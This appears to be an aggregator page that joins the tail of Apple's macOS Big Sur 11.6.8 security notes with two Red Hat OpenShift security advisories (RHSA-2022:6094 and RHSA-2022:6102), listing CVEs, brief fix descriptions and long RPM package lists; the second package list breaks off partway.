
**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2022-32811: ABC Research s.r.o

**Kernel**

Available for: macOS Big Sur

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32815: Xinru Chi of Pangu Lab

CVE-2022-32813: Xinru Chi of Pangu Lab

**libxml2**

Available for: macOS Big Sur

Impact: An app may be able to leak sensitive user information

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-32823

**PackageKit**

Available for: macOS Big Sur

Impact: An app may be able to modify protected parts of the file system

Description: An issue in the handling of environment variables was addressed with improved validation.

CVE-2022-32786: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Big Sur

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved checks.

CVE-2022-32800: Mickey Jin (@patch1t)

**PluginKit**

Available for: macOS Big Sur

Impact: An app may be able to read arbitrary files

Description: A logic issue was addressed with improved state management.

CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

**PS Normalizer**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32843: Kai Lu of Zscaler's ThreatLabz

**Software Update**

Available for: macOS Big Sur

Impact: A user in a privileged network position can track a user’s activity

Description: This issue was addressed by using HTTPS when sending information over the network.

CVE-2022-32857: Jeffrey Paul (sneak.berlin)

**Spindump**

Available for: macOS Big Sur

Impact: An app may be able to overwrite arbitrary files

Description: This issue was addressed with improved file handling.

CVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

**Spotlight**

Available for: macOS Big Sur

Impact: An app may be able to gain elevated privileges

Description: A validation issue in the handling of symlinks was addressed with improved validation of symlinks.

CVE-2022-26704: Joshua Mason of Mandiant

**TCC**

Available for: macOS Big Sur

Impact: An app may be able to access sensitive user information

Description: An access issue was addressed with improvements to the sandbox.

CVE-2022-32834: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**Vim**

Available for: macOS Big Sur

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating Vim.

CVE-2022-0156

CVE-2022-0158

**Wi-Fi**

Available for: macOS Big Sur

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32847: Wang Yu of Cyberserval

**Windows Server**

Available for: macOS Big Sur

Impact: An app may be able to capture a user’s screen

Description: A logic issue was addressed with improved checks.

CVE-2022-32848: Jeremy Legendre of MacEnhance

CVE-2022-32811: About the security content of macOS Big Sur 11.6.8

Red Hat Security Advisory 2022-6094-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.28.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.10.28 packages and security update  
Advisory ID:       RHSA-2022:6094-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6094  
Issue date:        2022-08-23  
CVE Names:         CVE-2022-23773 CVE-2022-23806 CVE-2022-24675  
                   CVE-2022-28327  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.10.28 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.10.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.10 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.10.28. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHBA-2022:6095

Security Fix(es):

* golang: cmd/go: misinterpretation of branch names can lead to incorrect  
access control (CVE-2022-23773)  
* golang: crypto/elliptic: IsOnCurve returns true for invalid field  
elements (CVE-2022-23806)  
* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)  
* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements  
2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar

6. Package List:

Red Hat OpenShift Container Platform 4.10:

Source:  
cri-o-1.23.3-13.rhaos4.10.git6af791c.1.el7.src.rpm  
openshift-ansible-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el7.src.rpm

noarch:  
openshift-ansible-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el7.noarch.rpm  
openshift-ansible-test-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el7.noarch.rpm

x86_64:  
cri-o-1.23.3-13.rhaos4.10.git6af791c.1.el7.x86_64.rpm  
cri-o-debuginfo-1.23.3-13.rhaos4.10.git6af791c.1.el7.x86_64.rpm

Red Hat OpenShift Container Platform 4.10:

Source:  
NetworkManager-1.30.0-16.el8_4.src.rpm  
console-login-helper-messages-0.20.4-1.rhaos4.10.el8.src.rpm  
cri-o-1.23.3-14.rhaos4.10.git6af791c.1.el8.src.rpm  
openshift-ansible-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el8.src.rpm

aarch64:  
NetworkManager-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-adsl-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-adsl-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-bluetooth-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-bluetooth-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-cloud-setup-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-cloud-setup-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-debugsource-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-libnm-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-libnm-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-libnm-devel-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-ovs-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-ovs-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-ppp-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-ppp-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-team-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-team-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-tui-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-tui-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-wifi-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-wifi-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-wwan-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-wwan-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
cri-o-1.23.3-14.rhaos4.10.git6af791c.1.el8.aarch64.rpm  
cri-o-debuginfo-1.23.3-14.rhaos4.10.git6af791c.1.el8.aarch64.rpm  
cri-o-debugsource-1.23.3-14.rhaos4.10.git6af791c.1.el8.aarch64.rpm

noarch:  
NetworkManager-config-connectivity-redhat-1.30.0-16.el8_4.noarch.rpm  
NetworkManager-config-server-1.30.0-16.el8_4.noarch.rpm  
NetworkManager-dispatcher-routing-rules-1.30.0-16.el8_4.noarch.rpm  
console-login-helper-messages-0.20.4-1.rhaos4.10.el8.noarch.rpm  
console-login-helper-messages-issuegen-0.20.4-1.rhaos4.10.el8.noarch.rpm  
console-login-helper-messages-profile-0.20.4-1.rhaos4.10.el8.noarch.rpm  
openshift-ansible-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el8.noarch.rpm

ppc64le:  
NetworkManager-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-adsl-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-adsl-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-bluetooth-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-bluetooth-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-cloud-setup-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-cloud-setup-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-debugsource-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-libnm-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-libnm-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-libnm-devel-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-ovs-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-ovs-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-ppp-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-ppp-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-team-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-team-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-tui-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-tui-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-wifi-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-wifi-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-wwan-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-wwan-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
cri-o-1.23.3-14.rhaos4.10.git6af791c.1.el8.ppc64le.rpm  
cri-o-debuginfo-1.23.3-14.rhaos4.10.git6af791c.1.el8.ppc64le.rpm  
cri-o-debugsource-1.23.3-14.rhaos4.10.git6af791c.1.el8.ppc64le.rpm

s390x:  
NetworkManager-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-adsl-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-adsl-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-bluetooth-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-bluetooth-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-cloud-setup-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-cloud-setup-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-debugsource-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-libnm-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-libnm-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-libnm-devel-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-ovs-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-ovs-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-ppp-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-ppp-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-team-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-team-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-tui-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-tui-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-wifi-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-wifi-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-wwan-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-wwan-debuginfo-1.30.0-16.el8_4.s390x.rpm  
cri-o-1.23.3-14.rhaos4.10.git6af791c.1.el8.s390x.rpm  
cri-o-debuginfo-1.23.3-14.rhaos4.10.git6af791c.1.el8.s390x.rpm  
cri-o-debugsource-1.23.3-14.rhaos4.10.git6af791c.1.el8.s390x.rpm

x86_64:  
NetworkManager-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-adsl-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-adsl-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-bluetooth-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-bluetooth-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-cloud-setup-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-cloud-setup-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-debugsource-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-libnm-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-libnm-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-libnm-devel-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-ovs-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-ovs-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-ppp-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-ppp-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-team-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-team-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-tui-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-tui-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-wifi-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-wifi-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-wwan-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-wwan-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
cri-o-1.23.3-14.rhaos4.10.git6af791c.1.el8.x86_64.rpm  
cri-o-debuginfo-1.23.3-14.rhaos4.10.git6af791c.1.el8.x86_64.rpm  
cri-o-debugsource-1.23.3-14.rhaos4.10.git6af791c.1.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-23773  
https://access.redhat.com/security/cve/CVE-2022-23806  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwVrz9zjgjWX9erEAQjcbA//eN2vW8asXYihLWgL9HUobwPZIVsGfYFq  
HsYP5wuVWXjrLrxMX0oka8EHcZEgl3g2wewdk2cuAsjt8D8dZszCivUfDe/JZmUD  
z5EZ5kBlUihrGm5xLysRgf11e5j+f0E14zIiy3KEaM7GfghiTZnT53RSh5j7gK3n  
Op5dQCdX6MmSxWmqTa2GvcoXK6eo3L/K4BKxvt0DLCByHQD9sazQg88Gv43eypcX  
SojHLVfLRbrQALy09258f/9n39uMaVIe0A34cTtoWG9w28xYPSEdicf3pJr+oxOq  
E9/x9b+rRYwHl+eDXvfx3zj1teovBTcfslR6W56/JPYUtpN9TuO+XMMkb9q7ujke  
vkJYewklQItsfj6MqbshbhRYAAneo9blk/TAePaez++OQQhhtEN8Ctgdh5/FSg2e  
cAldJQIEdG9O4KlpReNdS8++0MthbXtiumryy3hrv3VzlatQWfL57E0QeHh6iFPj  
uCnqBFuU0qTJA1NeJNfZo05iHmPF7LrlVVwo4ZJjt2e21UhJSyTinJRgYLAl0qsK  
f1PEeFChMafyuBLqRGPvWQb5J8v1GyAGzbalkw/yh2EWbPjvayaduP687tbpvAfJ  
6QQHIkOe53dzQcnnGB/RqSSWnYPuZiwpibquuUeUyx+tNvoZVw/2dxzZ9lpqIRRa  
D7wz6X/+NDE=zFte  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6094-01

Red Hat Security Advisory 2022-6102-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.11.1.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Low: OpenShift Container Platform 4.11.1 packages and security update  
Advisory ID:       RHSA-2022:6102-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6102  
Issue date:        2022-08-23  
CVE Names:         CVE-2022-30629  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.11.1 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.11.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.11 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.11.1. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2022:6103

Security Fix(es):

* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add

6. Package List:

Red Hat OpenShift Container Platform 4.11:

Source:  
NetworkManager-1.36.0-8.el8_6.src.rpm  
butane-0.15.0-2.rhaos4.11.el8.src.rpm  
console-login-helper-messages-0.20.4-1.rhaos4.11.el8.src.rpm  
cri-o-1.24.2-4.rhaos4.11.gitd6283df.el8.src.rpm  
ignition-2.14.0-4.rhaos4.11.el8.src.rpm  
openshift-4.11.0-202208101756.p0.g4f0dd4d.assembly.stream.el8.src.rpm  
openshift-ansible-4.11.0-202208111716.p0.gdf73941.assembly.stream.el8.src.rpm  
openshift-clients-4.11.0-202208110436.p0.gfcf512e.assembly.stream.el8.src.rpm  
openshift-kuryr-4.11.0-202208101627.p0.g6952743.assembly.stream.el8.src.rpm  
python-kubernetes-24.2.0-1.el8.src.rpm

aarch64:  
NetworkManager-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-adsl-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-adsl-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-bluetooth-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-bluetooth-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-cloud-setup-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-cloud-setup-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-debugsource-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-libnm-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-libnm-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-libnm-devel-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-ovs-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-ovs-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-ppp-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-ppp-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-team-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-team-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-tui-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-tui-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-wifi-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-wifi-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-wwan-1.36.0-8.el8_6.aarch64.rpm  
NetworkManager-wwan-debuginfo-1.36.0-8.el8_6.aarch64.rpm  
butane-0.15.0-2.rhaos4.11.el8.aarch64.rpm  
butane-debuginfo-0.15.0-2.rhaos4.11.el8.aarch64.rpm  
butane-debugsource-0.15.0-2.rhaos4.11.el8.aarch64.rpm  
cri-o-1.24.2-4.rhaos4.11.gitd6283df.el8.aarch64.rpm  
cri-o-debuginfo-1.24.2-4.rhaos4.11.gitd6283df.el8.aarch64.rpm  
cri-o-debugsource-1.24.2-4.rhaos4.11.gitd6283df.el8.aarch64.rpm  
ignition-2.14.0-4.rhaos4.11.el8.aarch64.rpm  
ignition-debuginfo-2.14.0-4.rhaos4.11.el8.aarch64.rpm  
ignition-debugsource-2.14.0-4.rhaos4.11.el8.aarch64.rpm  
ignition-validate-2.14.0-4.rhaos4.11.el8.aarch64.rpm  
ignition-validate-debuginfo-2.14.0-4.rhaos4.11.el8.aarch64.rpm  
openshift-clients-4.11.0-202208110436.p0.gfcf512e.assembly.stream.el8.aarch64.rpm  
openshift-hyperkube-4.11.0-202208101756.p0.g4f0dd4d.assembly.stream.el8.aarch64.rpm

noarch:  
NetworkManager-config-connectivity-redhat-1.36.0-8.el8_6.noarch.rpm  
NetworkManager-config-server-1.36.0-8.el8_6.noarch.rpm  
NetworkManager-dispatcher-routing-rules-1.36.0-8.el8_6.noarch.rpm  
butane-redistributable-0.15.0-2.rhaos4.11.el8.noarch.rpm  
console-login-helper-messages-0.20.4-1.rhaos4.11.el8.noarch.rpm  
console-login-helper-messages-issuegen-0.20.4-1.rhaos4.11.el8.noarch.rpm  
console-login-helper-messages-profile-0.20.4-1.rhaos4.11.el8.noarch.rpm  
openshift-ansible-4.11.0-202208111716.p0.gdf73941.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.11.0-202208111716.p0.gdf73941.assembly.stream.el8.noarch.rpm  
openshift-kuryr-cni-4.11.0-202208101627.p0.g6952743.assembly.stream.el8.noarch.rpm  
openshift-kuryr-common-4.11.0-202208101627.p0.g6952743.assembly.stream.el8.noarch.rpm  
openshift-kuryr-controller-4.11.0-202208101627.p0.g6952743.assembly.stream.el8.noarch.rpm  
python3-kubernetes-24.2.0-1.el8.noarch.rpm  
python3-kubernetes-tests-24.2.0-1.el8.noarch.rpm  
python3-kuryr-kubernetes-4.11.0-202208101627.p0.g6952743.assembly.stream.el8.noarch.rpm

ppc64le:  
NetworkManager-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-adsl-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-adsl-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-bluetooth-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-bluetooth-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-cloud-setup-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-cloud-setup-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-debugsource-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-libnm-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-libnm-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-libnm-devel-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-ovs-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-ovs-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-ppp-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-ppp-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-team-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-team-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-tui-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-tui-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-wifi-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-wifi-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-wwan-1.36.0-8.el8_6.ppc64le.rpm  
NetworkManager-wwan-debuginfo-1.36.0-8.el8_6.ppc64le.rpm  
butane-0.15.0-2.rhaos4.11.el8.ppc64le.rpm  
butane-debuginfo-0.15.0-2.rhaos4.11.el8.ppc64le.rpm  
butane-debugsource-0.15.0-2.rhaos4.11.el8.ppc64le.rpm  
cri-o-1.24.2-4.rhaos4.11.gitd6283df.el8.ppc64le.rpm  
cri-o-debuginfo-1.24.2-4.rhaos4.11.gitd6283df.el8.ppc64le.rpm  
cri-o-debugsource-1.24.2-4.rhaos4.11.gitd6283df.el8.ppc64le.rpm  
ignition-2.14.0-4.rhaos4.11.el8.ppc64le.rpm  
ignition-debuginfo-2.14.0-4.rhaos4.11.el8.ppc64le.rpm  
ignition-debugsource-2.14.0-4.rhaos4.11.el8.ppc64le.rpm  
ignition-validate-2.14.0-4.rhaos4.11.el8.ppc64le.rpm  
ignition-validate-debuginfo-2.14.0-4.rhaos4.11.el8.ppc64le.rpm  
openshift-clients-4.11.0-202208110436.p0.gfcf512e.assembly.stream.el8.ppc64le.rpm  
openshift-hyperkube-4.11.0-202208101756.p0.g4f0dd4d.assembly.stream.el8.ppc64le.rpm

s390x:  
NetworkManager-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-adsl-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-adsl-debuginfo-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-bluetooth-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-bluetooth-debuginfo-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-cloud-setup-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-cloud-setup-debuginfo-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-debuginfo-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-debugsource-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-libnm-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-libnm-debuginfo-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-libnm-devel-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-ovs-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-ovs-debuginfo-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-ppp-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-ppp-debuginfo-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-team-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-team-debuginfo-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-tui-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-tui-debuginfo-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-wifi-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-wifi-debuginfo-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-wwan-1.36.0-8.el8_6.s390x.rpm  
NetworkManager-wwan-debuginfo-1.36.0-8.el8_6.s390x.rpm  
butane-0.15.0-2.rhaos4.11.el8.s390x.rpm  
butane-debuginfo-0.15.0-2.rhaos4.11.el8.s390x.rpm  
